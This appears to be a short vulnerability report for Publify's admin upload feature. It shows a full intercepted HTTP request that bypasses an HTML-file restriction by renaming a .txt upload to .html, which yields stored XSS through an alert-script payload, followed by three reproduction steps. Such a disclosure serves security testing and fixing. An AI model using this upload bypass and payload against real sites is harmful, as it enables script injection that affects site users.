Unrestricted file upload allowed the attacker to manipulate the request and bypass the protection of HTML files using a text file, XSS Stored was obtained when uploading the HTML file.
POST /admin/resources/upload HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=SESSION_HERE
Content-Length: 649
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR7LwpeBoKn4f7hI5
Referer: https://demo-publify.herokuapp.com/admin/resources
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="utf8"
รขลโ
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="authenticity_token"
TOKEN_HERE
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="upload"; filename="w00t.txt" -- Change to w00t.html
Content-Type: text/plain
<script>alert('OOPSS');</script>
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="commit"
Upload
------WebKitFormBoundaryR7LwpeBoKn4f7hI5--
Step 1 - Upload a .txt file and intercept the request
Step 2 - Change the extension of filename to .html
Step 3 - Submit a request and the file will be uploaded successfully
https://drive.google.com/file/d/1bNffqwUl_9Sn7wqpBvEAqvV_PGRadlPb/view?usp=sharing